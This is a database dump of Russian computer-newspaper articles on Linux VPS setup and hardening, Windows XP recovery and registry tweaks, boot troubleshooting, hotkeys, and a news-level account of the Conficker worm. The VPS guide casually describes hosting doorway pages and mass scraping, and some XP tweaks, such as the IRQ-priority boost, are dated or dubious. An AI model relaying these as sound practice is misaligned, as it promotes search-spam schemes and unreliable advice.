127.0.0.1<br />Address: 127.0.0.1#53<br />Name: oops.com<br />Address: 192.168.1.2<br />Этo минимyм из тoгo, чтo нeoбxoдимo пpи пoднятии DNS.","Поднимаем DNS сервак - мини how<br />to","gazeta/img_705602.png","1375035240","4");
INSERT INTO gazeta_article VALUES("99","21","Сегодня буду рассказывать про<br />настройку сервера на Linux (в<br />частности, под CentOS 5.3), а также<br />про минимальные шаги,<br />предпринимаемые для защиты<br />сервера. Для чего нужен свой VPS/VDS? Чтобы<br />настроить их под свои потребности.<br />Скажу сразу, что я не сис. админ, я<br />программист. И все эти дела постигал<br />сам. Так что если у сис. админов будут<br />какие поучения - буду только рад выслушать.<br />Для чего я использую свой сервер? С<br />них удобно парсить все и вся, канал<br />позволяет; можно вешать сколько<br />влезет на сервак сайтов, никаких<br />тебе ограничений; вешаю контент дора на серваках, чтобы не<br />размещать их на "чужих" сайтах<br />Вообщем, делай что хочешь, ставь<br />софт какой хочешь, но и<br />настраивать/защищать, как правило,<br />придется все самому ("unmanaged серверы").<br />Что же я обычно ставлю на сервер:<br />apache не на дефолтный порт;<br />nginx - как легкий фронтэнд и<br />разгрузчик апача, отлично отдает<br />статику; иногда proftpd - FTP-сервер, если<br />планируется использовать сервер<br />для нескольких пользователей;<br />если планируется исопльзовать базы<br />данных, то mysql;<br />php, как mod_php к апачу; для мониторинга сервера/группы<br />серверов (нагрузки, состояние<br />сервисов, снятие количества<br />траффика с eth0, оповещение на mail<br />и jabber) ставлю Zabbix;<br />потихоньку защищаемся от брутфорса - SSHGuard или fail2ban.<br />Теперь по каждому пункту немного<br />подробней.<br />MySQL<br />Ставлю не всегда, только когда<br />требуется использовать базы - чаще всего, в CMSках. Идем на mysql.com,<br />раздел Downloads, скачиваем<br />исходные коды.<br />Актуальный how to по установке<br />мускула - http://www.r0xarena.com/ blog/install...-in-centos-53/ Совет: сразу же переменуйте<br />дефолтного пользователя root вот<br />что-нибудь неприментное, тем самым<br />немного усложните жизнь<br />брутфорсерам)<br />Apache Практически любые CMS-ки под<br />сплоги, динамические доры, большое<br />количество доргенов и прочее добро<br />работает на PHP,- apache, как веб-<br />сервер используется чаще всего. Я<br />никогда не использую всякие yum и apt-get, а предпочитаю собирать все<br />из сорсов вручную, так мне<br />надежней.<br />Установить apache проще простого.<br />Можно установить самому, прочитав<br />readme на сайте, а можно найти готовые how to в гугле. Например,<br />вот по этому туториалу http:// dan.drydog.com/apache2php.html апач точно ставится нормально<br />Вместе с апачем сразу ставим и PHP,<br />причем не советую ставить ветку<br />5.3.X, потому что в ней многие<br />функции, используемые в<br />популярных доргенах/CMSках, считаются устаревшими. Поэтому<br />ставим 5.2.X как mod_php, правим<br />httpd.conf так, как написано в how to.<br />После всего этого не забыаем<br />перезагрузить апач.<br />Nginx Как только поставили апач, сразу же<br />советую ставить nginx, легких<br />фронтэнд, который ставится как бы<br />"перед" апачем. Например, вещается<br />на 80-й порт, дефолтный для апача, а<br />апач переходит на другой порт, какой-нибудь 88 или 8080. Nginx<br />отлично передает статику (картинки,<br />js и т.д.), в то время как апач будет<br />обрабатывать только скрипты. Если<br />держите доры на этом сервере,<br />который часто бывают в топе, то позаботьтесь об установке nginx -<br />хотя бы для того, чтобы ваш сервер<br />не упал от простой картинки с<br />вашего сервера, поставленной на<br />каком-нибудь очень посещаемом<br />ресурсе. Nginx настраивается очень легко, есть<br />типичные конфигурации на сайте<br />разработчика http://sysoev.ru/nginx/, затруднений это вызвать не должно.<br />Proftpd<br />Хороший такой FTP-сервер, но тоже<br />ставлю не всегда. Только когда<br />предвидится использование сервера<br />несколькими людьми. Если же использую сервер я один, то не<br />парюсь и использую SFTP - это<br />безопасней и не надо фтп-сервер<br />ставить. Чем хорош proftpd - можно<br />быстро добавлять/удалять<br />пользователей, они хранятся в sql- базе.<br />Хороший how to по настройке proftpd<br />тут - http://community.livejournal.com/ tut...41.html#cutid2. У меня иногда бывают заминке при<br />сборке, но, видать, виной всему руки)<br />Zabbix<br />Многие не ставят сервисы для<br />мониторинга для своих систем. Ну и<br />плохо. Зато те, кто ставят, всегда в курсе того, что происходит с<br />серваком и днем и ночью. А знать это<br />очень важно - смотреть всплески<br />активности (может, кто ддосит,<br />парсит и т.д.), мониторить изменения<br />конфигов (может, кто пролез на сервер и добавил еще одного рута?!),<br />мониторить состояния всех сервисов.<br />В Zabbix можно устанавливать<br />триггеры - условия, при которых<br />наступает определенное действие.<br />Например, у меня стоит триггер на изменения в файле /etc/passwd. Если<br />кто-то надумает добавить нового<br />пользователя, то мне тут же придет<br />сообщение в Jabber об этом.<br />SSHGuard, fail2ban и прочее подобное<br />Защищают от брутфорсеров, которых сейчас как собак. SSHGuard, как<br />понятно, от брутфорса SSH; fail2ban -<br />вообще от кучи всего (SSH, форма<br />авторизации и прочее). Про fail2ban<br />расписано тут - http:// www.fail2ban.org/wiki/index.php/<br />Main_Page; про SSHGuard расписано тут - http:// sshguard.sourceforge.net/. Действуют они сходими способами -<br />отлавливают попытки бруфорса и<br />блочат по IP в фаерволле. Этим<br />пренебрегать никак не стоит, потому<br />как спасает от хоть и небольшой, но<br />все же возможности того, что ваш пасс сбрутят (если он у вас сложный),<br />также это спасает от тех всплесков<br />активности системы, которые<br />создаются этим самым брутфорсом.<br />Еще несколько советов.<br />Не разрешайте подключаться руту по SSH. Для этого создайте своего<br />пользователя, под которым вы<br />будете подключаться по SSH. Потом<br />через этого пользователя уже можно<br />будет получить права<br />привилегированного пользователя. Как это сделать - расписано тут.<br />А еще старайтесь не ставить FTP-<br />серер без необходимости. Если нужен<br />доступ по FTP, то используйте SFTP -<br />логин/пасс от SSH подключения. Для<br />этого подойте FileZilla или WinSCP. Это безопасней (не проснифают) и, в то<br />же время, не надо устанавливать<br />лишний сервис на сервак.<br />Сервер у меня угоняли пару раз, но<br />все удавалось вернуть на свои места.<br />Так что не пренебрегайте этими элементарными советами по<br />безопасности, а то можно в один<br />момент все быстро потерять.<br />Если вы сомневаетесь в своих<br />администраторских способностях, то<br />можно поставить панель Webmin - она бесплатная, достаточно легкая в<br />освоении. Админить сервер с ней<br />гораздо проще","Настраиваем сервер под себя","gazeta/img_414359.png","1375035363","4");
INSERT INTO gazeta_article VALUES("103","19","Да, несомненно, Windows XP,<br />нуждается в настройке под<br />конкретное оборудование и<br />конкретные задачи.<br />Итак, новая операционная система<br />успешно прошла первые испытания на вашем компьютере, все ее<br />возможности испробованы,<br />начальная эйфория от<br />сногсшибательной красоты<br />интерфейса постепенно улетучилась<br />и все чаще начинает проявляться необъяснимое внутреннее<br />неудовлетворение работой системы.<br />Краски интерфейса уже не кажутся<br />такими яркими, а его чрезмерная<br />дружественность начинает даже<br />немного раздражать. Со временем эти чувства все усиливаются и в один<br />замечательный день, исследовав<br />непомерное количество напрасно<br />расходуемых ресурсов, вы приходите<br />к выводу, что пора всему этому<br />положить конец. Да, несомненно, Windows XP,<br />нуждается в настройке под<br />конкретное оборудование и<br />конкретные задачи. Просто<br />невозможно создать продукт,<br />который бы идеально соответствовал всем требованиям<br />каждого конечного потребителя. В<br />большинстве случаев всё требует<br />тщательной настройки. Ведь<br />дружественный интерфейс, простота<br />управления, критерии выбора программных продуктов, - все это<br />понятия относительные. Как<br />говорится, на вкус и цвет товарищей<br />нет.<br />Прежде чем начать обзор<br />возможностей тонкой настройки Windows XP, я хотел бы остановиться<br />на некоторых общих вопросах. Для<br />начала нужно принять тот факт, что<br />повышение быстродействия системы<br />в большинстве случаев может быть<br />достигнуто только путем отказа от некоторых функций,<br />обеспечивающих дополнительное<br />удобство в работе или<br />автоматизацию процессов. При этом<br />нужно учесть, что действия в каждом<br />конкретном случае строго индивидуальны и стандартных схем<br />здесь не существует. Единственным и<br />самым надежным руководством<br />должны быть, прежде всего,<br />здравый смысл и логика. Более того,<br />я бы не хотел, чтобы посещение моего сайта стало для вас началом<br />длительных похождений по<br />различным сервисным центрам и<br />службам технической поддержки,<br />поэтому начнем мы не с открытия<br />редактора реестра, а с краткого обзора методов восстановления<br />системы.<br />Самым простым из них является<br />использование программы<br />«Восстановление системы», которую<br />можно запустить из группы служебных программ меню «Пуск».<br />Создав с ее помощью контрольную<br />точку восстановления, вы всегда<br />сможете вернуться к исходному<br />состоянию системы. Конечно, при<br />условии работоспособности Windows. При полном крахе системы данная<br />программа вам не поможет.<br />Другой, не менее простой способ<br />сохранения реестра и файлов<br />конфигурации - обычное<br />копирование содержимого папки С: \WINDOWS\SYSTEM32\CONFIG. Такой<br />метод позволит вам в считанные<br />секунды оживить систему из DOS.<br />Единственным препятствием для<br />этого является то, что для<br />отображения разделов NTFS потребуется специальный драйвер,<br />скачать который можно с http:// www.sysinternals.com/ Если же вы установили операционную систему на<br />раздел с FAT или FAT 32, никаких<br />дополнительных драйверов не<br />понадобится.<br />Наиболее радикальный метод<br />заключается в использовании так называемого диска аварийного<br />восстановления системы. Этот диск<br />можно легко создать при помощи<br />«Программы архивации», запустив<br />«Мастер аварийного восстановления<br />системы». Так как вместе с дискетой создается полный архив всего<br />системного раздела, то<br />предварительно нужно позаботиться<br />о наличии необходимого свободного<br />пространства на жестком диске или<br />другом носителе. Для восстановления системы достаточно загрузиться с<br />компакт-диска с дистрибутивом и<br />нажать F2 после того, как на экране<br />появится соответствующее<br />сообщение.<br />Кроме всего перечисленного существует множество утилит<br />сторонних производителей, а<br />«продвинутые» пользователи и<br />профи, конечно же, будут<br />использовать Recovery Сonsole.<br />Теперь давайте воспользуемся одним (а лучше несколькими) из<br />перечисленных методов на тот<br />случай, если сделаем что-то не так.<br />Создадим резервную копию<br />важнейших файлов, спрячем диск<br />аварийного восстановления в надежное место подальше от<br />магнитных полей и, наконец,<br />займемся оптимизацией системы.","Восстановление Windows XP","gazeta/img_704797.png","1375056548","4");
INSERT INTO gazeta_article VALUES("104","19","Тот факт, что Windows XP уже<br />ворвалась в нашу жизнь изменить<br />никак нельзя. Можно только к этому<br />привыкнуть и с этим смириться.<br />Тот факт, что Windows XP уже<br />ворвалась в нашу жизнь изменить никак нельзя. Можно только к этому<br />привыкнуть и с этим смириться.<br />Радует только одно - с каждой новой<br />версией Windows появляется все<br />больше возможностей настройки<br />системы, а значит получить то, что нам требуется, мы сможем, хотя для<br />этого и придется приложить немного<br />усилий. Прочитал я много статей по<br />оптимизации Windows и пришел к<br />такому выводу, что в них очень много<br />не нужного, привожу только самое необходимое и не более того. Делюсь<br />тем, что знаю.<br />Изменить заставку на входе в систему:<br />Выбираем Пуск/Выполнить, набираем<br />"regedt32" и нажимаем "OK". Находим<br />в системном реестре следующий ключ: HKEY_USERS\DEFAULT\Control<br />Panel\Desktop. И меняем строковый<br />параметр "SCRNSAVE.EXE" с "logon.scr"<br />на путь и имя к той заставке, которая<br />вам больше по вкусу. Главное, чтобы<br />путь был указан правильно, а если файл заставки находится в каталоге<br />%SystemRoot%\System32, то путь<br />можно вообще не указывать,<br />достаточно одного имени файла. (сам<br />еще не пробовал)<br />Отменить экран заставки XP при загрузке:<br />Данное действие поможет, правда<br />совсем немного уменьшить время<br />загрузки вашей ОС. Не забывайте<br />только, что в результате вы также не<br />будете видеть и всякие сообщения системы о процессе загрузки (chkdsk,<br />convert ... ), хотя, если проблем у вас<br />нет, можно проделывать это смело.<br />Все, что нам нужно, это<br />отредактировать файл BOOT.INI,<br />добавив в него параметр "/ noguiboot" сразу после "/fastdetect".<br />После рестарта системы заставка<br />возникать больше не будет, и на<br />медленных компьютерах это может<br />сэкономить вам несколько секунд.<br />Соответственно, чтобы вернуть все на свои места, надо в том же BOOT.INI<br />удалить вышеуказанный параметр.<br />Отключаем индексирование:<br />Делается это следующим образом.<br />Открываете "Мой компьютер",<br />кликаете правой клавишей мыши на иконке жесткого диска и выбираете<br />"Свойства". В самом низу<br />открывшегося окна вы увидите<br />галочку напротив пункта "Разрешить<br />индексирование диска для быстрого<br />поиска". Вот эту самую галочку и следует убрать. После нажатия<br />кнопок "Применить" или "ОК"<br />появится новое окно, в котором вам<br />будет задан вопрос, применить ли<br />выбранные атрибуты только к<br />текущему диску или и ко вложенным файлам и папкам тоже.<br />Окончательное исполнение данной<br />процедуры может занять пару минут<br />(смотря сколько у вас файлов на<br />диске), но в результате вы сможете<br />наслаждаться немного более быстрой работой ОС. Естественно, что<br />работает это только для дисков с<br />файловой системой NTFS.<br />Увеличиваем производительность<br />NTFS:<br />Перво-наперво, отключим создание коротких имен. По-умолчанию NTFS<br />генерирует имена согласно старому<br />правилу 8.3 для совместимости с MS-<br />DOS и Windows 3.x клиентами. Если в<br />вашей сети таких клиентов не<br />наблюдается, то можно смело эту функцию отключать, для чего<br />следует поменять значение ключа<br />NtfsDisable8dot3NameCreation на 1.<br />Найдете вы этот ключ в системном<br />реестре в разделе HKEY_LOCAL_<br />MACHINE\SYSTEM\CurrentControlSet\ Control\Filesystem.<br />Вторым шагом мы отключим запись<br />даты последнего обновления файла.<br />По-умолчанию NTFS каждый раз при<br />изменении любого файла записывает<br />дату и время его последнего обновления. На больших разделах<br />NTFS это может очень существенно<br />влиять на производительность<br />файловой системы. А отключить это<br />так же просто: надо ключу<br />NtfsDisableLastAccessUpdate присвоить значение 1. Находится этот ключ в<br />том же разделе HKEY_LOCAL_MACHINE\<br />SYSTEM\CurrentContolSet\Control<br />\Filesystem. Может так оказаться, что<br />такого ключа не существует, тогда<br />его надо создать с типом REG_DWORD. Теперь отведем достаточно места для<br />главной файловой таблицы.<br />Добавьте в системный реестр ключ<br />NtfsMftZoneReservation типа REG_<br />DWORD в раздел HKEY_LOCAL_MACHINE<br />\SYSTEM\CurrentControlSet\Control \FileSystem. Когда вы это сделаете,<br />система зарезервирует место на диске<br />для главной таблицы размещения<br />файлов. Для чего это нужно? Да для<br />того, чтобы взять под контроль<br />процесс роста этой таблицы. Если на ваших разделах NTFS мало файлов,<br />но они большого размера, то<br />наилучшим значением созданного<br />параметра будет 1 (по-умолчанию).<br />Обычно оптимальным значением<br />является 2 или 3. А 4 (максимальное значение) следует использовать<br />только в случае, если у вас на диске<br />количество файлов огромно (десятки<br />тысяч). Тем не менее, со значениями<br />больше 2 следует<br />экспериментировать осторожно, так как в этом случае система может<br />отхватить для таблицы размещения<br />файлов немаленький кусок<br />дискового пространства.<br />Самый простой способ отключить<br />UpnP: Эта брешь в безопасности известна,<br />по-моему, с тех пор, когда XP была<br />еще в пеленках. Тем не менее, что-то<br />с нею делать надо, поэтому проще<br />всего для того, чтобы отключить<br />Universal Plug and Play, скачать программу с сайта www.grc.com.<br />Программа эта маленькая, всего 22Кб<br />и подходит ко всем версиям Windows<br />XP (Pro и Home).<br />Office XP - отключаем посылку<br />ошибок: Office XP имеет невероятно нужную<br />функцию - при возникновении<br />ошибки, он пытается отправить отчет<br />о ней в Microsoft. Если вам это<br />надоело, то функцию эту можно<br />отключить. Ниже я привожу текст .REG-файла, который вам в этом<br />поможет:<br />REGEDIT4<br />[HKEY_CURRENT_USER\Software\ Policies<br />\Microsoft\Office.0\Common]<br />"DWNeverUpload"=dword:00000001 "DWNoExternalURL"=dword:00000001<br />"DWNoFileCollection"=dword:00000001<br />"DWNoSecondLevelCollection"=dword:<br />00000001<br />[HKEY_USERS\.Default\Software\ Policies<br />\Microsoft\Office.0\Common] "DWNeverUpload"=dword:00000001<br />"DWNoExternalURL"=dword:00000001<br />"DWNoFileCollection"=dword:00000001<br />"DWNoSecondLevelCollection"=dword:<br />00000001<br />Удаляем Windows Messenger: Если вы не используете Windows<br />Messenger, то почему бы не удалить<br />его вовсе? Каждый раз при загрузке<br />системы Messenger ведь тоже<br />стартует, замедляет процесс запуска,<br />пожирает системные ресурсы. А для того, чтобы его удалить надо всего<br />лишь в командной строке Пуск/<br />Выполнить напечатать следующее:<br />"RunDll32 advpack.dll,LaunchINFSection<br />%windir%\INF<br />\msmsgs.inf,BLC.Remove" и нажать "OK". После этой операции вам будет<br />предложено перезагрузиться. А после<br />перезагрузки вы уже Messenger у себя<br />на компьютере не найдете.<br />СОВЕТУЮ СДЕЛАТЬ В ПЕРВУЮ ОЧЕРЕДЬ<br />В Windows XP появилась новая функция BootDefrag (или<br />BootOptimize), суть которой<br />заключается в следующем.<br />Поскольку дефрагментация и<br />оптимизация расположения на диске<br />файлов, нужных системе во время загрузки, решающим образом влияет<br />на весь процесс загрузки ОС, а<br />пользователю часто лениво самому<br />запускать дефрагментатор (не то<br />чтобы даже часто, а почти всегда), то<br />система теперь умеет сама - так сказать, без участия оператора -<br />оптимизировать эти файлы, причем<br />не как ей вздумается, а основываясь<br />на данных все тех же файлов<br />notosboot-B00DFAAD.pf и layout.ini.<br />Правда, происходит автоматическая дефрагментация при простое системы<br />- если пользователь 10-30 минут<br />после загрузки ОС не производил<br />никаких операций. А потому может<br />случиться так, что на вашей<br />интенсивно используемой системе файлы окажутся не оптимизированы.<br />Проверить, произошла ли<br />оптимизация, можно, заглянув в<br />реестр - если в разделе HKEY_LOCAL_<br />MACHINE\SOFTWARE\Microsoft\Dfrg<br />\BootOptimizeFunction стоит параметр "OptimizeComplete"="Yes", то<br />дефрагментация была произведена.<br />Если же этого пока не случилось, то<br />просто перегрузите ПК и оставьте его<br />минут на тридцать в одиночестве -<br />Windows сама все сделает, и ускорение следующей загрузки будет<br />заметно даже на глаз.<br />Только запомните, что перед<br />оптимизацией ПК со<br />свежеустановленной ОС должен<br />иметь в своем багаже хотя бы три перезагрузки для накопления<br />нужных данных. Штатный<br />дефрагментатор Windows XP не<br />отменяет эту оптимизацию, так что<br />пользоваться им можно без опаски.<br />Если же вы сомневаетесь, работает ли вообще у вас эта функция, или<br />хотите ее отключить, то проверьте в<br />реестре наличие параметра,<br />включающего BootDefrag: HKEY_<br />LOCAL_MACHINE\SOFTWARE\Microsoft<br />\Dfrg\BootOptimizeFunction - параметр "Enable"="Y".<br />Уменьшение задержки вывода меню:<br />Не секрет, что все меню Windows XP<br />открываются с определенной<br />задержкой, что иногда несколько<br />раздражает. Для более быстрого открытия меню необходимо изменить<br />значения ключа MenuShowDelay,<br />расположенного в разделе HKEY_<br />CURRENT_USER/Control Panel/Desktop.<br />По умолчанию значение этого ключа<br />равно 400. Если изменить это значение в 0, то Вы увидите<br />значительное ускорение открытие<br />меню.(советую 100, 0 слишком<br />быстро)<br />Изменяем приоритет запросов на<br />прерывание (IRQ) Итак, последний совет по<br />увеличению производительности–<br />изменение приоритета запросов на<br />прерывание. Для тех, кто не знаком с<br />этим понятием, напомним, что<br />каждому компоненту Вашего компьютера назначается номер<br />прерывания IRQ для доступа к<br />системной шине. Если увеличить<br />приоритет CMOS памяти и часов<br />реального времени, то можно<br />увеличить производительность всех элементов системной платы. Для<br />начала необходимо определить, для<br />какого устройства Вы хотите<br />увеличить производительность.<br />Затем, Вы должны определить, какой<br />запрос на прерывание использует это устройство. Для этого необходимо<br />открыть Control Panel a System (Вы<br />так же можете воспользоваться<br />комбинацией клавиш Windows<br />+Break). Нажмите на закладку<br />’Hardware’ и нажмите кнопку ’Device Manager’. Теперь правой кнопкой<br />мышки войдите в свойства<br />выбранного устройства, и выберите<br />закладку ’Resources’.<br />Здесь Вы можете увидеть, какой<br />номер IRQ используется выбранным устройством. Запомните номер<br />прерывания и закройте все окна.<br />Теперь запустите RegEdit. Найдите<br />раздел HKEY_LOCAL_MACHINE/ System/<br />CurrentControlSet/ Control/<br />PriorityControl. Создайте новый DWORD ключ IRQ#Priority (где ’#’<br />номер IRQ), и установите его в 1.<br />Например, в нашем случае IRQ<br />нашего System CMOS равен 08.<br />Поэтому мы создали ключ<br />IRQ8Priority. Теперь, после перезагрузки, Вы<br />должны обратить внимание на<br />увеличение производительности<br />выбранного компонента. Мы<br />рекомендовали бы Вам именно CMOS,<br />поскольку он увеличивает производительность все системной<br />платы. Так же Вы можете создать<br />множественные приоритеты IRQ,<br />однако это не очень эффективно и<br />может привести к неустойчивой<br />работе. Для удаления настройки, просто удалите созданный ключ.","Оптимизация Windows XP","gazeta/img_229918.png","1375056623","4");
INSERT INTO gazeta_article VALUES("105","19","Не расстраивайтесь сразу, если у вас<br />не загружается система. Я использую<br />комплект аварийных дискет, которые<br />меня уже не раз выручали<br />" Системная дискета соответствующей<br />Windows (95, 98, Me). Главное, чтобы на ней была программа sys.com и она<br />могла видеть диски FAT32 - 1шт.<br />" Системная дискета из пакета Norton<br />Utilities 7.0 (или 8.0) для DOS. Для<br />дисков FAT16 - 1 шт.<br />" Комплект системных дискет из пакета Norton Utilities 4.0 for Windows<br />98 (или NU2000, NU2001) - 3 шт.<br />" Загрузочная дискета, на которой<br />записан Volkov Commander. (его<br />использую по причине маленького<br />размера - до 200 КБайт) 1. Если у вас не включается питание<br />(на опыте блока питания AT формата)<br />Вероятная причина - выход из строя<br />блока питания. Лучше купить новый,<br />но если магазины закрыты, то надо<br />сделать следующие шаги. " Обязательно! Отключить все от<br />системного блока, особенно питание,<br />и монитор при выключенной кнопке<br />питания на передней панели (на<br />видеокарту тоже подается питание).<br />" Вскрыть системный блок, отсоединить все провода,<br />подходящие к блоку питания, снять<br />блок питания<br />" Вскрыть блок питания. Отвинтить<br />плату, отключив при необходимости<br />разъемы и запомнив их подключение. Осмотреть плату блока питания на<br />обрыв дорожек и на нахождение<br />испорченных деталей. У нас<br />попадалось так, что разорвался<br />терморезистор (временно можно<br />поставить перемычку вместо терморезистора и при разрыве<br />дорожек.<br />" Все собрать и можно работать,<br />дожидаясь, когда откроется магазин,<br />в котором можно купить новый блок<br />питания. 2. Если POST не видит HDD (винчестер<br />или жесткий диск)<br />POST (Power on self test) - это система<br />внутренней диагностики компьютера.<br />Она опрашивает всю систему до<br />загрузки операционной системы и в случае обнаружения ошибки может<br />выдавать как звуковой сигнал, так и<br />сообщение на экран монитора. POST<br />вырисовывает рамку на темном фоне,<br />в которой указывается тип<br />процессора, размер памяти (ОЗУ), размер НDD и какие диски<br />подключены.<br />При загрузке компьютера зайти в<br />CMOS SETUP<br />Открыть Standart Cmos Setup и<br />посмотреть есть ли напротив строк Primary Master или Secondary Master<br />параметры HDD. Если есть, то<br />переходите к пункту 3.<br />Если нет, то загрузите IDE HDD<br />Autodetection (или что-то подобное)<br />для автоматического определения. Или вручную ввести данные,<br />прочитав их с HDD на вкладке<br />Standart Cmos Setup.<br />Далее продолжаем проверку -<br />вскройте системный блок только при<br />отключенном питании! Проверьте подсоединения всех<br />шлейфов (часто перекашивается<br />информационный шлейф на самом<br />HDD).<br />Продуйте все от пыли заодно.<br />Если это не помогает, то попробуйте, проверить батарейку на напряжение<br />и ток. Снимать батарейку только при<br />отключенном питании! Обычно<br />напряжение нормальное, а ток очень<br />маленький. И при необходимости<br />заменить батарейку. После всех этих махинаций обычно<br />POST должен видеть HDD. Если у вас<br />не получилось, отнесите в любой<br />сервис-центр, занимающийся<br />ремонтом компьютеров.<br />3. POST определяет HDD, но система не загружается (Windows 9x/Me)<br />Загрузится с системной дискеты<br />Windows, в командной строке ввести<br />С: и нажать Enter.<br />Если все нормально, то переходим в<br />пункт 4. Если нет, то запускаем fdisk и<br />выбираем 4 пункт. Проверяем,<br />активен ли системный диск, и при<br />необходимости делаем его активным,<br />выбирая пункт 2 в главном меню<br />fdisk Иначе, пробуем запустить программу<br />ndd из Norton Utilities в зависимости<br />от типа FAT таблицы.<br />Самое вероятное в данной ошибке -<br />это разные копии FAT таблиц. Данную<br />ошибку с успехом исправляет программа ndd из Norton Utilities (из<br />опыта своей работы).<br />4. Все предыдущие ошибки<br />исправлены, но Windows не<br />загружается.<br />Попробуйте выполнить команду sys.com c: при загрузке с системной<br />дискеты Windows и перезагрузиться.<br />Следующий этап (если загрузка<br />отсутствует):<br />С помощью одного из менеджеров<br />файлов для DOS (например, Norton Commander, Volkov Commander, Dos<br />navigator или подобным) открыть<br />каталог Windows (или как он у вас<br />называется) и найти следующие<br />файлы<br />1. system.dat 2. user.dat<br />3. system.da0<br />4. user.da0<br />Если у вас есть файлы 3 и 4, то<br />скопируйте их, дав им название 1 и 2<br />файлов. Провести Scandisk из Norton Utilities.<br />При невозможности загрузиться в<br />нормальной графической оболочке,<br />даже в режиме защиты от сбоев,<br />рекомендую переустановить<br />Windows. Надеюсь, что эта статья кому-нибудь<br />будет полезна. Все данные взяты из<br />опыта моей работы.","Если у вас не загружается система.","gazeta/img_725638.png","1375056697","4");
INSERT INTO gazeta_article VALUES("106","19","Win - Открытие или свертывание<br />меню Пуск<br />Win +BREAK - Открытие диалогового<br />окна Свойства системы<br />Win - Свертывание всех окон<br />Win + М - Свертывание всех окон Win +SHIFT+M - Восстановление<br />свернутых окон<br />Win + Е - Открытие окна «Мой<br />компьютер».<br />Win + F - Поиск файла или папки<br />CTRL+ Win + F - Поиск компьютеров Win +F1 - Вывод справки Windows<br />Win +L - Блокировка компьютера при<br />подключении к домену или<br />переключение пользователей, если<br />компьютер не подключен к домену<br />Win +R - Открытие диалогового окна Выполнить<br />Win +U - Откройте диспетчер<br />служебных программ<br />CTRL + C - Копирование (в том числе<br />сообщений об ошибках в Windows)<br />CTRL + X - Вырезание CTRL + V - Вставка<br />CTRL + Z - Отмена<br />SHIFT + DELETE - Удаление элемента<br />без помещения его в корзину и<br />возможности восстановления<br />Удерживание нажатой клавиши CTRL при перетаскивании элемента -<br />Копирование выбранного элемента<br />Удерживание нажатыми клавиш<br />CTRL + SHIFT при перетаскивании<br />элемента - Создание ярлыка для<br />выбранного элемента F2 - Переименование выбранного<br />элемента<br />CTRL + СТРЕЛКА ВПРАВО -<br />Перемещение курсора в начало<br />следующего слова<br />CTRL + СТРЕЛКА ВЛЕВО - Перемещение курсора в начало предыдущего слова<br />CTRL + СТРЕЛКА ВНИЗ - Перемещение<br />курсора в начало следующего абзаца<br />CTRL + СТРЕЛКА ВВЕРХ - Перемещение<br />курсора в начало предыдущего<br />абзаца CTRL + SHIFT - с любой стрелкой<br />Выделение абзаца<br />SHIFT с любой стрелкой - Выделите<br />нескольких элементов в окне или на<br />рабочем столе, а также выделение<br />текста в документе CTRL+A - Выделение всего<br />F3 - Поиск файла или папки<br />ALT+ENTER - Просмотр свойств<br />выбранного элемента<br />ALT+F4 - Закрытие текущего элемента<br />или выход из активной программы ALT + ПРОБЕЛ - Отображение<br />системного меню активного окна<br />CTRL+F4 - Закрытие активного<br />документа в программах,<br />допускающих одновременное<br />открытие нескольких документов ALT+TAB - Переход от одного<br />открытого элемента к другому<br />ALT+ESC - Переключение между<br />элементами в том порядке, в котором<br />они были открыты<br />F6 - Переключение между элементами экрана в окне или на<br />рабочем столе<br />F4 - Отображение списка строки<br />адреса в окне «Mой компьютер» или<br />в окне проводника Windows<br />SHIFT+F10 - Открытие контекстного меню для выделенного элемента<br />ALT + ПРОБЕЛ Отображение<br />системного меню активного окна<br />CTRL+ESC Открытие меню Пуск<br />ALT + подчеркнутая буква в названии<br />меню - Отображение соответствующего меню<br />Подчеркнутая буква в имени<br />команды открытого меню -<br />Выполнение соответствующей<br />команды<br />F10 - Активизация строки меню текущей программы<br />СТРЕЛКА ВПРАВО - Открытие<br />следующего меню справа или<br />открытие подменю<br />СТРЕЛКА ВЛЕВО - Открытие<br />следующего меню слева или закрытие подменю<br />F5 - Обновление активного окна<br />BACKSPACE - Просмотр папки на<br />уровень выше в окне «Мой<br />компьютер» или в окне проводника<br />Windows ESC - Отмена текущего задания<br />SHIFT при вставке компакт-диска в<br />дисковод - Предотвращает<br />автоматическое воспроизведение<br />компакт-диска","Горячие клавиши 2","gazeta/img_640086.png","1375056762","4");
INSERT INTO gazeta_article VALUES("107","19","В предыдущих номерах<br />компьютерной газеты мой<br />многоуважаемый коллега Евгений<br />поведал нам о вредоносных<br />программах, которые заставили<br />попотеть антивирусные компании по всему миру и ввергли в глубокий шок<br />простых пользователей. Это<br />знаменитые Rustok.C и Sinowal –<br />зловреды нового поколения<br />вредоносных программ со всеми<br />вытекающими. Сегодня я продолжу этот занимательный рассказ, а<br />говорить буду о нашумевшем черве,<br />который имеет три различных<br />названия, постоянно мелькающие в<br />новостных сводках RSS лент<br />разнообразных ресурсов IT-тематики. Вы, наверное, уже догадались, что<br />же это за он? Правильно, это<br />Conficker, он же Kido и Downadup. Ну<br />что ж, приступим к анализу и начнем,<br />пожалуй, с отголосков прошлого, а<br />точнее с 2008 года. 2008…<br />Впервые о Conficker заговорили еще<br />в октябре 2008 года. 23 числа того<br />месяца, компания Microsoft<br />обнаружила критическую уязвимость<br />во всех ОС Windows, связанную с системной службой Server. Уязвимость<br />существует из-за ошибки в<br />библиотеке netapi32.dll при<br />обработке RPC запросов. Как<br />утверждают, удаленный<br />пользователь может с помощью специально сформированного RPC<br />запроса вызвать переполнение<br />буфера в стеке и вызвать отказ в<br />обслуживании системы или<br />выполнить произвольный код на<br />целевой системе с привилегиями учетной записи SYSTEM. Именно этой<br />дырой и воспользовались<br />разработчики червя. И именно через<br />нее он и ведет свое активное<br />размножение, скачивая свои копии<br />из Интернета. Причем разработчики вируса научились постоянно менять<br />свои сервера, что не дает<br />возможности отследить<br />распространение Conficker.<br />Периодически червь случайным<br />образом генерирует около 50 тыс. доменных имён в сутки, к которым<br />обращается для получения<br />исполняемого кода. При получении с<br />сайта исполняемого файла червь<br />сверяет электронно-цифровую<br />подпись и, если она совпала, запускает файл. За считанные месяцы<br />вирусом были заражены миллионы<br />компьютеров по всему миру.<br />Лидирующие строки по<br />распространенности Conficker’а<br />занимают Китай, Россия и Бразилия, что видно из диаграммы на рисунке 1. Нажмите для По состоянию на февраль 2009 года в<br />этих странах специалисты по<br />компьютерной безопасности<br />насчитали 260.000, 200.000 и 175.000<br />случаев заражения соответственно.<br />Всего, по последним данным, червь заразил более 13.000.000 машин.<br />Неплохо, не так ли?? Причем<br />10.000.000 были инфицированы за<br />первые 4 дня распространения!<br />Статистика заражения операционных<br 